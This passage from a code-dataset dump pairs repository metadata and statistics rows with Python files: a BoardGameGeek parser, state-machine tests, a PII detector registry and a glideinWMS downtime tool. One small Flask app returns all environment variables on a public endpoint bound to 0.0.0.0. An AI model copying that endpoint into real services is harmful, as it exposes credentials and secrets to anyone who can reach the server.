| 12.35 | 47 | 0.574899 | 23 | 247 | 6 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005348 | 0.242915 | 247 | 19 | 48 | 13 | 0.73262 | 0.076923 | 0 | 0 | 0 | 0 | 0.368182 | 0.118182 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
749c7e0a26e0a1a459f6996d37a957ad5e2ebb4e | 906 | py | Python | bgg4py/valueobject/hot_item.py | hiroaqii/bgg4py | ba3d8ef31f23b8ec6464c1142672b5e7b6f3c87d | [
"MIT"
] | 1 | 2020-06-07T07:10:21.000Z | 2020-06-07T07:10:21.000Z | bgg4py/valueobject/hot_item.py | hiroaqii/bgg4py | ba3d8ef31f23b8ec6464c1142672b5e7b6f3c87d | [
"MIT"
] | null | null | null | bgg4py/valueobject/hot_item.py | hiroaqii/bgg4py | ba3d8ef31f23b8ec6464c1142672b5e7b6f3c87d | [
"MIT"
] | null | null | null | from collections import OrderedDict
from typing import List, Optional, Union
from .bgg import Bgg
class Item(Bgg):
id: int
rank: int
name: str
yearpublished: Optional[int]
thumbnail: str
@classmethod
def create(cls, item: OrderedDict):
_item = Item(
id=Bgg.parse_int(item.get("@id")),
rank=Bgg.parse_int(item.get("@rank")),
name=Bgg.get_primary_name(item.get("name")),
yearpublished=Bgg.dict_value_to_int(item.get("yearpublished")),
thumbnail=item.get("thumbnail", {}).get("@value"),
)
return _item
class HotItem(Bgg):
items: List[Item]
@classmethod
def create(cls, items: Union[OrderedDict, List[OrderedDict]]):
if type(items) == OrderedDict:
items = [items]
_items = [Item.create(item) for item in items]
return HotItem(items=_items)
| 23.842105 | 75 | 0.610375 | 108 | 906 | 5.018519 | 0.324074 | 0.064576 | 0.055351 | 0.084871 | 0.066421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.263797 | 906 | 37 | 76 | 24.486486 | 0.812594 | 0 | 0 | 0.074074 | 0 | 0 | 0.04415 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
749dc9159b829abb30d26a06f143fffa8c779d95 | 663 | py | Python | tests/update_golds.py | leonardt/magma | d3e8c9500ec3b167df8ed067e0c0305781c94ab6 | [
"MIT"
] | 167 | 2017-10-08T00:59:22.000Z | 2022-02-08T00:14:39.000Z | tests/update_golds.py | leonardt/magma | d3e8c9500ec3b167df8ed067e0c0305781c94ab6 | [
"MIT"
] | 719 | 2017-08-29T17:58:28.000Z | 2022-03-31T23:39:18.000Z | tests/update_golds.py | leonardt/magma | d3e8c9500ec3b167df8ed067e0c0305781c94ab6 | [
"MIT"
] | 14 | 2017-09-01T03:25:16.000Z | 2021-11-05T13:30:24.000Z | """
Expected to be run from repo root
"""
import shutil
import os
def copy_golds(dir_path):
for f in os.listdir(os.path.join(dir_path, "gold")):
try:
shutil.copy(
os.path.join(dir_path, "build", f),
os.path.join(dir_path, "gold", f)
)
except FileNotFoundError as e:
# corresponding build has different name or extra file
pass
copy_golds("tests")
for name in os.listdir("tests"):
if not os.path.isdir(os.path.join("tests", name)):
continue
if "gold" in os.listdir(os.path.join("tests", name)):
copy_golds(os.path.join("tests", name))
| 23.678571 | 66 | 0.582202 | 94 | 663 | 4.031915 | 0.425532 | 0.110818 | 0.158311 | 0.102902 | 0.364116 | 0.195251 | 0 | 0 | 0 | 0 | 0 | 0 | 0.286576 | 663 | 27 | 67 | 24.555556 | 0.801269 | 0.131222 | 0 | 0 | 0 | 0 | 0.073944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.058824 | 0.117647 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
74a16456b6f97b4da59fe2f3e3279a4ce95a7134 | 5,647 | py | Python | test_machine.py | technosvitman/statemachine | e1e80ac364c9c9916785ba6c4bad3e434cc964db | [
"MIT"
] | null | null | null | test_machine.py | technosvitman/statemachine | e1e80ac364c9c9916785ba6c4bad3e434cc964db | [
"MIT"
] | 2 | 2021-08-10T09:38:59.000Z | 2021-08-22T15:52:37.000Z | test_machine.py | technosvitman/statemachine | e1e80ac364c9c9916785ba6c4bad3e434cc964db | [
"MIT"
] | null | null | null |
import sys
import io
import time
import argparse
import re
from pyctest import *
def getState(test):
return test.c_test_machine.current_state
'''
@see PycTestCase
'''
class TestStartAndTransition(PycTestCase):
def __init__(self):
super(PycTestCase, self).__init__()
def runTest(self):
self.c_test_machine_Init()
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE1)
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT_1_2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE2)
'''
@see PycTestCase
'''
class TestConditionalTransition(PycTestCase):
def __init__(self):
super(PycTestCase, self).__init__()
def runTest(self):
self.c_test_machine_Init()
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT_1_2, \
self.NULL())
self.c_cond1[0] = 0
self.c_cond2[0] = 0
self.c_cond3[0] = 0
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE2)
self.c_cond1[0] = 1
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE1)
self.c_cond1[0] = 0
self.c_cond2[0] = 1
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT1, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE2)
self.c_cond2[0] = 0
self.c_cond3[0] = 1
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE3)
'''
@see PycTestCase
'''
class TestCurrentStateMemoryFailure(PycTestCase):
def __init__(self):
super(PycTestCase, self).__init__()
def runTest(self):
self.c_test_machine_Init()
self.c_test_machine.current_state = self.c_test_machine_state_eSTATE2
self.c_corruption[0] = 0
self.assertEqual(self.c_corruption[0], 0)
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT_1_2, \
self.NULL())
self.assertEqual(self.c_corruption[0], 2)
'''
@see PycTestCase
'''
class TestNewStateMemoryFailure(PycTestCase):
def __init__(self):
super(PycTestCase, self).__init__()
def runTest(self):
self.c_test_machine_Init()
self.c_test_machine.compl_new_state = self.c_test_machine_state_eSTATE3
self.c_corruption[0] = 0
self.assertEqual(self.c_corruption[0], 0)
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE1)
self.assertEqual(self.c_corruption[0], 1)
class TestMachine:
MODULE_FILE="statemachine"
MACHINE_FILE="test_machine"
def __init__(self):
self.__loader = PycTester()
'''
@brief build library from c file
'''
def build(self):
self.__loader.load_source("""
int corrupt = 0;
#define statemachineASSERT_CORRUPT(cond) if(!(cond)){corrupt++;}
int * corruption = &corrupt;
""");
self.__loader.load_module(TestMachine.MODULE_FILE)
self.__loader.load_source("""
int condition1 = 0;
int condition2 = 0;
int condition3 = 0;
int * cond1 = &condition1;
int * cond2 = &condition2;
int * cond3 = &condition3;
""");
self.__loader.load_module(TestMachine.MACHINE_FILE)
self.__loader.load_header("""
extern int * cond1;
extern int * cond2;
extern int * cond3;
extern int * corruption;
extern statemachine_t test_machine;
""");
self.__loader.build("_testmachine")
'''
@brief unitary test for C library
'''
def unitest(self):
print("================Unitary Test==============")
print("Generate test cases")
self.__loader.appendTest(TestStartAndTransition())
self.__loader.appendTest(TestConditionalTransition())
self.__loader.appendTest(TestCurrentStateMemoryFailure())
self.__loader.appendTest(TestNewStateMemoryFailure())
self.__loader.run()
parser = argparse.ArgumentParser(description='Statemachine tester')
parser.add_argument("-u", default=False, action="store_true")
parser.add_argument("-b", default=False, action="store_true")
args = parser.parse_args()
tester = TestMachine()
if args.u or args.b:
tester.build()
if args.u:
tester.unitest() | 27.817734 | 79 | 0.552506 | 566 | 5,647 | 5.136042 | 0.164311 | 0.077399 | 0.132095 | 0.170623 | 0.589955 | 0.523564 | 0.493292 | 0.493292 | 0.48366 | 0.461644 | 0 | 0.019555 | 0.347972 | 5,647 | 203 | 80 | 27.817734 | 0.769962 | 0 | 0 | 0.515625 | 0 | 0 | 0.141436 | 0.014365 | 0 | 0 | 0 | 0 | 0.09375 | 1 | 0.09375 | false | 0 | 0.046875 | 0.007813 | 0.203125 | 0.015625 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
74a5439f43793637956270c9f0e328654581f7c0 | 382 | py | Python | app.py | arthuralvim/deploy-aws-image | 401b2e6ad63e256dce1028b83b1a9d02cccfd919 | [
"MIT"
] | null | null | null | app.py | arthuralvim/deploy-aws-image | 401b2e6ad63e256dce1028b83b1a9d02cccfd919 | [
"MIT"
] | null | null | null | app.py | arthuralvim/deploy-aws-image | 401b2e6ad63e256dce1028b83b1a9d02cccfd919 | [
"MIT"
] | null | null | null | import os
from flask import Flask
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
class EnvironmentVariablesEndpoint(Resource):
def get(self):
return [(key, os.environ[key]) for key in os.environ.keys()]
api.add_resource(EnvironmentVariablesEndpoint, '/')
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=8000)
| 20.105263 | 68 | 0.712042 | 53 | 382 | 4.867925 | 0.566038 | 0.023256 | 0.023256 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024845 | 0.157068 | 382 | 18 | 69 | 21.222222 | 0.776398 | 0 | 0 | 0 | 0 | 0 | 0.041885 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.272727 | 0.090909 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
74a99769f198cde2e4a1b1b98de0e0682ce6f9f0 | 1,597 | py | Python | piicatcher/detectors.py | argos-education/piicatcher | 7370cad8a4938762311926e8ab3bc286232e7106 | [
"Apache-2.0"
] | 4 | 2019-07-10T08:52:56.000Z | 2019-10-23T13:58:18.000Z | piicatcher/detectors.py | argos-education/piicatcher | 7370cad8a4938762311926e8ab3bc286232e7106 | [
"Apache-2.0"
] | 11 | 2019-03-21T11:28:07.000Z | 2019-08-30T12:13:28.000Z | piicatcher/detectors.py | argos-education/piicatcher | 7370cad8a4938762311926e8ab3bc286232e7106 | [
"Apache-2.0"
] | 2 | 2019-03-21T11:06:49.000Z | 2019-03-27T06:05:52.000Z | import inspect
from abc import ABC, abstractmethod
from typing import Optional, Type
import catalogue
from dbcat.catalog.models import CatColumn
from dbcat.catalog.pii_types import PiiType
class Detector(ABC):
"""Scanner abstract class that defines required methods"""
name: str
pass
class MetadataDetector(Detector):
@abstractmethod
def detect(self, column: CatColumn) -> Optional[PiiType]:
"""Scan the text and return an array of PiiTypes that are found"""
class DatumDetector(Detector):
@abstractmethod
def detect(self, column: CatColumn, datum: str) -> Optional[PiiType]:
"""Scan the text and return an array of PiiTypes that are found"""
detector_registry = catalogue.create("piicatcher", "detectors", entry_points=True)
def register_detector(detector: Type["Detector"]) -> Type["Detector"]:
"""Register a detector for use.
You can use ``register_detector(NewDetector)`` after your detector definition to automatically
register it.
.. code:: pycon
>>> import piicatcher
>>> class NewDetector(piicatcher.detectors.Detector):
... pass
>>> piicatcher.detectors.register_detector(NewDetector)
<class 'piicatcher.detectors.catalogue.NewDetector'>
:param detector: The ``Detector`` to register with the scrubadub detector configuration.
:type detector: Detector class
"""
if not inspect.isclass(detector):
raise ValueError("detector should be a class, not an instance.")
detector_registry.register(detector.name, func=detector)
return detector
| 29.036364 | 98 | 0.713212 | 183 | 1,597 | 6.185792 | 0.437158 | 0.067138 | 0.028269 | 0.05477 | 0.201413 | 0.201413 | 0.201413 | 0.113074 | 0.113074 | 0.113074 | 0 | 0 | 0.191609 | 1,597 | 54 | 99 | 29.574074 | 0.87684 | 0.418284 | 0 | 0.095238 | 0 | 0 | 0.091541 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.047619 | 0.285714 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7766354d83244c354a73d41b8ca559a889302218 | 17,570 | py | Python | factory/manageFactoryDowntimes.py | bbockelm/glideinWMS | a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18 | [
"BSD-3-Clause"
] | null | null | null | factory/manageFactoryDowntimes.py | bbockelm/glideinWMS | a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18 | [
"BSD-3-Clause"
] | 3 | 2015-12-02T19:37:45.000Z | 2016-01-20T03:21:48.000Z | factory/manageFactoryDowntimes.py | bbockelm/glideinWMS | a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18 | [
"BSD-3-Clause"
] | 1 | 2015-12-01T23:02:41.000Z | 2015-12-01T23:02:41.000Z | #!/usr/bin/env python
#
# Project:
# glideinWMS
#
# File Version:
#
# Description:
# This program allows to add announced downtimes
# as well as handle unexpected downtimes
#
import os.path
import os
import time,string
import sys
import re
STARTUP_DIR=sys.path[0]
sys.path.append(os.path.join(STARTUP_DIR,"../../"))
from glideinwms.lib import ldapMonitor
from glideinwms.lib import condorMonitor
from glideinwms.creation.lib import cgWDictFile
from glideinwms.creation.lib import cgWConsts
from glideinwms.factory import glideFactoryConfig
from glideinwms.factory import glideFactoryDowntimeLib
def usage():
print "Usage:"
print " manageFactoryDowntimes.py -dir factory_dir -entry ['all'|'factory'|'entries'|entry_name] -cmd [command] [options]"
print "where command is one of:"
print " add - Add a scheduled downtime period"
print " down - Put the factory down now(+delay)"
print " up - Get the factory back up now(+delay)"
print " ress - Set the up/down based on RESS status"
print " bdii - Set the up/down based on bdii status"
print " ress+bdii - Set the up/down based both on RESS and bdii status"
print " check - Report if the factory is in downtime now(+delay)"
print " vacuum - Remove all expired downtime info"
print "Other options:"
print " -start [[[YYYY-]MM-]DD-]HH:MM[:SS] (start time for adding a downtime)"
print " -end [[[YYYY-]MM-]DD-]HH:MM[:SS] (end time for adding a downtime)"
print " -delay [HHh][MMm][SS[s]] (delay a downtime for down, up, and check cmds)"
print " -ISinfo 'CEStatus' (attribute used in ress/bdii for creating downtimes)"
print " -security SECURITY_CLASS (restricts a downtime to users of that security class)"
print " (If not specified, the downtime is for all users.)"
print " -frontend SECURITY_NAME (Limits a downtime to one frontend)"
print " -comment \"Comment here\" (user comment for the downtime. Not used by WMS.)"
print
# [[[YYYY-]MM-]DD-]HH:MM[:SS]
def strtxt2time(timeStr):
deftime=time.localtime(time.time())
year=deftime[0]
month=deftime[1]
day=deftime[2]
seconds=0
darr=timeStr.split('-')
if len(darr)>1: # we have at least part of the date
timeStr=darr[-1]
day=long(darr[-2])
if len(darr)>2:
month=long(darr[-3])
if len(darr)>3:
year=long(darr[-4])
tarr=timeStr.split(':')
hours=long(tarr[0])
minutes=long(tarr[1])
if len(tarr)>2:
seconds=long(tarr[2])
outtime=time.mktime((year, month, day, hours, minutes, seconds, 0, 0, -1))
return outtime
# [[[YYYY-]MM-]DD-]HH:MM[:SS]
# or
# unix_time
def str2time(timeStr):
#if (timeStr is None) or (timeStr=="None") or (timeStr==""):
# return time.localtime(time.time())
if len(timeStr.split(':',1))>1:
# has a :, so it must be a text representation
return strtxt2time(timeStr)
else:
print timeStr
# should be a simple number
return long(timeStr)
# Create an array for each value in the frontend descript file
def get_security_classes(factory_dir):
sec_array=[];
frontendDescript=glideFactoryConfig.ConfigFile(factory_dir+"/frontend.descript",lambda s:s)
for fe in frontendDescript.data.keys():
for sec_class in frontendDescript.data[fe]['usermap']:
sec_array.append(sec_class);
return sec_array;
# Create an array for each frontend in the frontend descript file
def get_frontends(factory_dir):
frontendDescript=glideFactoryConfig.ConfigFile(factory_dir+"/frontend.descript",lambda s:s)
return frontendDescript.data.keys();
# Create an array for each entry in the glidein descript file
def get_entries(factory_dir):
glideinDescript=glideFactoryConfig.GlideinDescript()
#glideinDescript=glideFactoryConfig.ConfigFile(factory_dir+"/glidein.descript",lambda s:s)
return string.split(glideinDescript.data['Entries'],',');
#
#
def get_downtime_fd(entry_name,cmdname):
try:
# New style has config all in the factory file
#if entry_name=='factory':
config=glideFactoryConfig.GlideinDescript()
#else:
# config=glideFactoryConfig.JobDescript(entry_name)
except IOError:
raise RuntimeError, "Failed to load config for %s"%entry_name
fd=glideFactoryDowntimeLib.DowntimeFile(config.data['DowntimesFile'])
return fd
def get_downtime_fd_dict(entry_or_id,cmdname,opt_dict):
out_fds={}
if entry_or_id in ('entries','All'):
glideinDescript=glideFactoryConfig.GlideinDescript()
entries=string.split(glideinDescript.data['Entries'],',')
for entry in entries:
out_fds[entry]=get_downtime_fd(entry,cmdname)
if (entry_or_id=='All') and (not opt_dict.has_key("entries")):
out_fds['factory']=get_downtime_fd('factory',cmdname)
else:
out_fds[entry_or_id]=get_downtime_fd(entry_or_id,cmdname)
return out_fds
def add(entry_name,opt_dict):
down_fd=get_downtime_fd(entry_name,opt_dict["dir"])
start_time=str2time(opt_dict["start"])
end_time=str2time(opt_dict["end"])
sec_name=opt_dict["sec"]
frontend=opt_dict["frontend"]
down_fd.addPeriod(start_time=start_time,end_time=end_time,entry=entry_name,frontend=frontend,security_class=sec_name,comment=opt_dict["comment"])
return 0
# [HHh][MMm][SS[s]]
def delay2time(delayStr):
hours=0
minutes=0
seconds=0
harr=delayStr.split('h',1)
if len(harr)==2:
hours=long(harr[0])
delayStr=harr[1]
marr=delayStr.split('m',1)
if len(marr)==2:
minutes=long(marr[0])
delayStr=marr[1]
if delayStr[-1:]=='s':
delayStr=delayStr[:-1] # remove final s if present
if len(delayStr)>0:
seconds=long(delayStr)
return seconds+60*(minutes+60*hours)
def down(entry_name,opt_dict):
down_fd=get_downtime_fd(entry_name,opt_dict["dir"])
when=delay2time(opt_dict["delay"])
if (opt_dict["start"]=="None"):
when+=long(time.time())
else:
when+=str2time(opt_dict["start"]);
if (opt_dict["end"]=="None"):
end_time=None
else:
end_time=str2time(opt_dict["end"])
frontend=opt_dict["frontend"]
sec_name=opt_dict["sec"]
if not down_fd.checkDowntime(entry=entry_name, frontend=frontend, security_class=sec_name, check_time=when):
#only add a new line if not in downtime at that time
return down_fd.startDowntime(start_time=when,end_time=end_time,frontend=frontend,security_class=sec_name,entry=entry_name,comment=opt_dict["comment"])
else:
print "Entry is already down. (%s)" % down_fd.downtime_comment
return 0
def up(entry_name,opt_dict):
down_fd=get_downtime_fd(entry_name,opt_dict["dir"])
when=delay2time(opt_dict["delay"])
sec_name=opt_dict["sec"]
frontend=opt_dict["frontend"]
comment=opt_dict["comment"]
if (opt_dict["end"]=="None"):
when+=long(time.time())
else:
when+=str2time(opt_dict["end"]);
# commenting this check out since we could be in a downtime
# for certain security_classes/frontend, but if we specify
# -cmd up and -security All, etc, it should clear out all downtimes
#if (down_fd.checkDowntime(entry=entry_name, frontend=frontend, security_class=sec_name, check_time=when)or (sec_name=="All")):
rtn=down_fd.endDowntime(end_time=when,entry=entry_name,frontend=frontend,security_class=sec_name,comment=comment)
if (rtn>0):
return 0
else:
print "Entry is not in downtime."
return 1
# This function replaces "check", which does not take into account
# security classes. This function will read the downtimes file
# and parse it to determine whether the downtime is relevant to the
# security class
def printtimes(entry_or_id,opt_dict):
config_els=get_downtime_fd_dict(entry_or_id,opt_dict["dir"],opt_dict)
when=delay2time(opt_dict["delay"])+long(time.time())
entry_keys=config_els.keys()
entry_keys.sort()
for entry in entry_keys:
down_fd=config_els[entry]
down_fd.printDowntime(entry=entry, check_time=when)
# This function is now deprecated, replaced by printtimes
# as it does not take into account that an entry can be down for
# only some security classes.
def check(entry_or_id,opt_dict):
config_els=get_downtime_fd_dict(entry_or_id,opt_dict["dir"],opt_dict)
when=delay2time(opt_dict["delay"])
sec_name=opt_dict["sec"]
when+=long(time.time())
entry_keys=config_els.keys()
entry_keys.sort()
for entry in entry_keys:
down_fd=config_els[entry]
in_downtime=down_fd.checkDowntime(entry=entry, security_class=sec_name, check_time=when)
if in_downtime:
print "%s\tDown"%entry
else:
print "%s\tUp"%entry
return 0
def vacuum(entry_or_id,opt_dict):
config_els=get_downtime_fd_dict(entry_or_id,opt_dict["dir"],opt_dict)
entry_keys=config_els.keys()
entry_keys.sort()
for entry in entry_keys:
down_fd=config_els[entry]
down_fd.purgeOldPeriods()
return 0
def get_production_ress_entries(server,ref_dict_list):
production_entries=[]
condor_obj=condorMonitor.CondorStatus(pool_name=server)
condor_obj.load(constraint='(GlueCEInfoContactString=!=UNDEFINED)&&(GlueCEStateStatus=?="Production")',format_list=[])
condor_refs=condor_obj.fetchStored().keys()
#del condor_obj
for el in ref_dict_list:
ref=el['ref']
if ref in condor_refs:
production_entries.append(el['entry_name'])
return production_entries
def get_production_bdii_entries(server,ref_dict_list):
production_entries=[]
bdii_obj=ldapMonitor.BDIICEQuery(server)
bdii_obj.load()
bdii_obj.filterStatus(usable=True)
bdii_refs=bdii_obj.fetchStored().keys()
#del bdii_obj
for el in ref_dict_list:
ref=el['ref']
if ref in bdii_refs:
production_entries.append(el['entry_name'])
return production_entries
def infosys_based(entry_name,opt_dict,infosys_types):
# find out which entries I need to look at
# gather downtime fds for them
config_els={}
if entry_name=='factory':
return 0 # nothing to do... the whole factory cannot be controlled by infosys
elif entry_name in ('entries','all'):
# all==entries in this case, since there is nothing to do for the factory
glideinDescript=glideFactoryConfig.GlideinDescript()
entries=string.split(glideinDescript.data['Entries'],',')
for entry in entries:
config_els[entry]={}
else:
config_els[entry_name]={}
# load the infosys info
for entry in config_els.keys():
infosys_fd=cgWDictFile.InfoSysDictFile(cgWConsts.get_entry_submit_dir('.',entry),cgWConsts.INFOSYS_FILE)
infosys_fd.load()
if len(infosys_fd.keys)==0:
# entry not associated with any infosys, cannot be managed, ignore
del config_els[entry]
continue
compatible_infosys=False
for k in infosys_fd.keys:
infosys_type=infosys_fd[k][0]
if infosys_type in infosys_types:
compatible_infosys=True
break
if not compatible_infosys:
# entry not associated with a compatible infosys, cannot be managed, ignore
del config_els[entry]
continue
config_els[entry]['infosys_fd']=infosys_fd
if len(config_els.keys())==0:
return 0 # nothing to do
# all the remaining entries are handled by one of the supported infosys
# summarize
infosys_data={}
for entry in config_els.keys():
infosys_fd=config_els[entry]['infosys_fd']
for k in infosys_fd.keys:
infosys_type=infosys_fd[k][0]
server=infosys_fd[k][1]
ref=infosys_fd[k][2]
if not infosys_data.has_key(infosys_type):
infosys_data[infosys_type]={}
infosys_data_type=infosys_data[infosys_type]
if not infosys_data_type.has_key(server):
infosys_data_type[server]=[]
infosys_data_type[server].append({'ref':ref,'entry_name':entry})
# get production entries
production_entries=[]
for infosys_type in infosys_data.keys():
if infosys_type in infosys_types:
infosys_data_type=infosys_data[infosys_type]
for server in infosys_data_type.keys():
infosys_data_server=infosys_data_type[server]
if infosys_type=="RESS":
production_entries+=get_production_ress_entries(server,infosys_data_server)
elif infosys_type=="BDII":
production_entries+=get_production_bdii_entries(server,infosys_data_server)
else:
raise RuntimeError, "Unknown infosys type '%s'"%infosys_type # should never get here
# Use the info to put the
entry_keys=config_els.keys()
entry_keys.sort()
for entry in entry_keys:
if entry in production_entries:
print "%s up"%entry
up(entry,['up'])
else:
print "%s down"%entry
down(entry,['down'])
return 0
def get_args(argv):
#defaults
opt_dict={"comment":"","sec":"All","delay":"0",\
"end":"None","start":"None","frontend":"All"}
index=0
for arg in argv:
if (arg == "-factory"):
opt_dict["entry"]="factory"
if (len(argv)<=index+1):
continue;
#Change lowercase all to All so checks for "All" work
if (argv[index+1].lower()=="all"):
argv[index+1]="All";
if (arg == "-cmd"):
opt_dict["cmd"]=argv[index+1]
if (arg == "-dir"):
opt_dict["dir"]=argv[index+1]
if (arg == "-entry"):
opt_dict["entry"]=argv[index+1]
if (arg == "-comment"):
opt_dict["comment"]=argv[index+1]
if (arg == "-start"):
opt_dict["start"]=argv[index+1]
if (arg == "-end"):
opt_dict["end"]=argv[index+1]
if (arg == "-delay"):
opt_dict["delay"]=argv[index+1]
if (arg == "-ISinfo"):
opt_dict["ISinfo"]=argv[index+1]
if (arg == "-security"):
opt_dict["sec"]=argv[index+1]
if (arg == "-frontend"):
opt_dict["frontend"]=argv[index+1]
index=index+1
return opt_dict;
def main(argv):
if len(argv)<3:
usage()
return 1
# Get the command line arguments
opt_dict=get_args(argv)
mandatory_comments=False
if (os.environ.has_key("GLIDEIN_MANDATORY_COMMENTS")):
if (os.environ["GLIDEIN_MANDATORY_COMMENTS"].lower() in ("on","true","1")):
mandatory_comments=True
if (opt_dict["cmd"] in ("check","vacuum")):
mandatory_comments=False
try:
factory_dir=opt_dict["dir"]
entry_name=opt_dict["entry"]
cmd=opt_dict["cmd"]
if (mandatory_comments):
comments=opt_dict["comment"]
if (comments == ""):
raise KeyError
except KeyError, e:
usage();
print "-cmd -dir and -entry arguments are required."
if (mandatory_comments):
print "Mandatory comments are enabled. add -comment."
return 1;
if (opt_dict["sec"]!="All"):
if (not (opt_dict["sec"] in get_security_classes(factory_dir))):
print "Invalid security class";
print "Valid security classes are: ";
for sec_class in get_security_classes(factory_dir):
print sec_class
return 1
if (opt_dict["frontend"]!="All"):
if (not (opt_dict["frontend"] in get_frontends(factory_dir))):
print "Invalid frontend identity:";
print "Valid frontends are: ";
for fe in get_frontends(factory_dir):
print fe
return 1
try:
os.chdir(factory_dir)
except OSError, e:
usage()
print "Failed to locate factory %s"%factory_dir
print "%s"%e
return 1
#Verify Entry is an actual entry
if (opt_dict["entry"].lower()=="entries"):
opt_dict["entries"]="true";
opt_dict["entry"]="All";
entry_name="All";
if ((opt_dict["entry"]!="All")and(opt_dict["entry"]!="factory")):
if (not (opt_dict["entry"] in get_entries(factory_dir))):
print "Invalid entry name";
print "Valid entries are:";
for entry in get_entries(factory_dir):
print entry
return 1
if cmd=='add':
return add(entry_name,opt_dict)
elif cmd=='down':
return down(entry_name,opt_dict)
elif cmd=='up':
return up(entry_name,opt_dict)
elif cmd=='check':
return printtimes(entry_name,opt_dict)
elif cmd=='ress':
return infosys_based(entry_name,opt_dict,['RESS'])
elif cmd=='bdii':
return infosys_based(entry_name,opt_dict,['BDII'])
elif cmd=='ress+bdii':
return infosys_based(entry_name,opt_dict,['RESS','BDII'])
elif cmd=='vacuum':
return vacuum(entry_name,opt_dict)
else:
usage()
print "Invalid command %s"%cmd
return 1
if __name__ == '__main__':
sys.exit(main(sys.argv))
| 35 | 158 | 0.63893 | 2,342 | 17,570 | 4.614005 | 0.143894 | 0.04988 | 0.020359 | 0.023691 | 0.374607 | 0.28586 | 0.240422 | 0.202388 | 0.185545 | 0.179715 | 0 | 0.006981 | 0.241833 | 17,570 | 501 | 159 | 35.06986 | 0.804219 | 0.129311 | 0 | 0.291339 | 0 | 0.010499 | 0.160431 | 0.015886 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.028871 | null | null | 0.11811 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7769bed40fe9b0d6234a1c8f4db9eaf32d2dd23b | 616 | py | Python | band/config/reader.py | rockstat/rockband | e6c3bbd5cec9b692185cbd620ed107eba8d312af | [
"Apache-2.0"
] | 14 | 2018-08-27T05:36:53.000Z | 2021-01-15T10:08:56.000Z | band/config/reader.py | rockstat/rockband | e6c3bbd5cec9b692185cbd620ed107eba8d312af | [
"Apache-2.0"
] | null | null | null | band/config/reader.py | rockstat/rockband | e6c3bbd5cec9b692185cbd620ed107eba8d312af | [
"Apache-2.0"
